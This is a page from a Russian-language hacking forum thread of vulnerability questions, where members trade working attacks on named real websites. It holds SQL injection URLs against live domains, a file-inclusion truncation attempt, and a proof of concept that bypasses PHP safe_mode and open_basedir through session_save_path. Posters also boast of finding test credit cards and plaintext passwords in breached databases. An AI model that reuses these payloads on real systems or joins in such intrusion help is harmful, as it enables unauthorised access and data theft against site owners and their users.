Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    696
    Likes Received:
    404
    Reputations:
    134
    safemode=on?
     
  2. CyberHunter

    CyberHunter Active Member

    Joined:
    6 Jan 2010
    Messages:
    601
    Likes Received:
    116
    Reputations:
    37
    Случайно нашел. Это пхп-инъекция? Вот что в ошибке:
     
  3. wwwall

    wwwall New Member

    Joined:
    2 Dec 2006
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    Safe mode: OFF
     
  4. mental2

    mental2 Elder - Старейшина

    Joined:
    13 Aug 2007
    Messages:
    4
    Likes Received:
    1
    Reputations:
    0
    Не подскажите, почему
    http://www.asteroid.ru/user_view.phtml?2034/2/17.phtml[///...///]
    Когда вставляю 4036 слешей, то они не отображаются, а когда 4037 то отображаются, да и вообще почему не пашет инклуд? :) Какие могут быть причины? Из за абсолютного пути?
    На счёт этого поста?
    http://forum.antichat.ru/showpost.php?p=1023030&postcount=16
    Где собственно последовательность?)) И если на линухе 1к символов с копейками, и на Linux 4065, то если ставить допустим 5к символов, то сработает в любом случае и там и там? или сть какие правила?

    зы. Я хочу понять как это работает. На указанный сайт мне плевать.
     
    #12004 mental2, 26 Mar 2010
    Last edited: 26 Mar 2010
  5. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    us
    Code:
    http://www.asteroid.ru/user_view.phtml?2034/2/17
    
    там и так по умолчанию нужное тебе расширение добавляется, чего ты там отрезать хочешь?
     
  6. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    696
    Likes Received:
    404
    Reputations:
    134
    Есть ли рабочие методы обхода safe-mode для Apache+PHP/5.2.12+Freebsd 8 ?
    Если да, то какие?))
     
  7. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    session.save_path safe_mode and open_basedir bypass
    Code:
    EXAMPLES:
    
    1. session_save_path("/DIR/WHERE/YOU/HAVE/ACCESS")
    2. session_save_path("5;/DIR/WHERE/YOU/HAVE/ACCESS")
    
    The main problem came when we use multiple ';' character and when we will
    create fake directory structure to reduce '../'.
    
    Proof of Concept:
    0. Create directories:
    
    /humhum
    
    and
    
    /byp
    
    1. set open_basedir = /byp
    2. create test.php 
    {
    session_save_path("/humhum");
    session_start();
    }
    3. php test.php
    
    Warning: session_save_path(): open_basedir restriction in effect.
    File(/humhum) is not within the allowed path(s): (/byp) in /byp/test.php on
    line 3
    4. subdir.php
    {
    mkdir("puf");
    mkdir(";a");
    }
    5. php subdir.php
    6. cd puf
    7. create byp.php 
    {
    
    session_save_path(";;/byp/;a/../../humhum");
    session_start();
    
    }
    8. php byp.php
    9. ls /humhum
    sess_d905eb71c9ad65ce2a845cdb0fed3016
    
    The main problem is located in session.c. PHP doesn't check, that we have
    used next ';' after first. Creating fake directory structure
    
    mkdir ';a'
    mkdir '../;a'
    
    we can reduce directory level using '../' .
    
     
    2 people like this.
  8. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    709
    Likes Received:
    729
    Reputations:
    948
    либо:
    Code:
    _http://www.orderflowers.co.il/products.php?cid=49+and+(1,1)=(select+*+from+(select+name_const(version(),1),name_const(version(),1))eba%20)
    Duplicate column name '5.0.77'
     
    1 person likes this.
  9. Darren

    Darren Banned

    Joined:
    14 Jun 2008
    Messages:
    34
    Likes Received:
    5
    Reputations:
    6
    шелл не залить, админку не нашёл, картон 2 штуки и то тестовые) хех)
     
  10. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    696
    Likes Received:
    404
    Reputations:
    134
    2 pashkela: тот метод - особый случай. но меня не сработал ниразу..
     
  11. CyberHunter

    CyberHunter Active Member

    Joined:
    6 Jan 2010
    Messages:
    601
    Likes Received:
    116
    Reputations:
    37
    Подскажите, вот что сегодня ношел:
    Code:
    http://www.federationpress.com.au/journals/abstract.asp?id=144'
    Я так понял, что это MS Acces. Прочитал статью о таких инъекциях - ничего не смог сделать :(
    Вот еще такая же:
    Code:
    http://www.etradesman.com.au/tradesman/tradesman.asp?id=144'
    Как быть с такими?

    И еще хотел спросить что это такое?
    Code:
    http://www.startdreams.com.au/LearnAboutMoney/KB_Content.aspx?section=KB_MB&id=144'
    Можно ли провести инъекцию при такой ошибке?
     
  12. fletch

    fletch Member

    Joined:
    14 Jul 2009
    Messages:
    8
    Likes Received:
    25
    Reputations:
    20
    нет это не инъекция, нельзя
     
  13. [x60]unu

    [x60]unu Banned

    Joined:
    7 May 2009
    Messages:
    98
    Likes Received:
    498
    Reputations:
    163
    серьезно ?
    Code:
    http://www.etradesman.com.au/tradesman/tradesman.asp?id=144+union+select+1+from+news
     
  14. CyberHunter

    CyberHunter Active Member

    Joined:
    6 Jan 2010
    Messages:
    601
    Likes Received:
    116
    Reputations:
    37
    Ну а в первых двух?
     
    #12014 CyberHunter, 27 Mar 2010
    Last edited: 27 Mar 2010
  15. BrainDeaD

    BrainDeaD Elder - Старейшина

    Joined:
    9 Jun 2005
    Messages:
    774
    Likes Received:
    292
    Reputations:
    214
    короче есть скуль. вывожу все колонки - показывает все кроме password, хотя она существует.
    вопрос: почему? и где пароли?
     
  16. warlok

    warlok Elder - Старейшина

    Joined:
    17 Feb 2008
    Messages:
    328
    Likes Received:
    142
    Reputations:
    81
    может там пусто ?)
     
    1 person likes this.
  17. Darren

    Darren Banned

    Joined:
    14 Jun 2008
    Messages:
    34
    Likes Received:
    5
    Reputations:
    6
    Может ли оказаться так что небудет принтабельного поля?
    http://www.zckc.com.tw/products.php?cID=49%20union%20select%201,version(),3%20--
     
    1 person likes this.
  18. ILYAtirtir

    ILYAtirtir Elder - Старейшина

    Joined:
    25 Apr 2007
    Messages:
    142
    Likes Received:
    246
    Reputations:
    73
    Там не в этом дело.
     
    1 person likes this.
  19. BrainDeaD

    BrainDeaD Elder - Старейшина

    Joined:
    9 Jun 2005
    Messages:
    774
    Likes Received:
    292
    Reputations:
    214
    +100500
    действительно пароли оказались только у нескольких пользователей из сотен или тысяч. и все в открытом виде гыыы.
     
  20. Taleon

    Taleon New Member

    Joined:
    8 Feb 2009
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    не могу понять есть тут sql иньекция или нет...

    http://www.klipart.ru/package.php?id=symmetricspiders'
    дошел до 50 столбцов и ничего. :(
     
Thread Status:
Not open for further replies.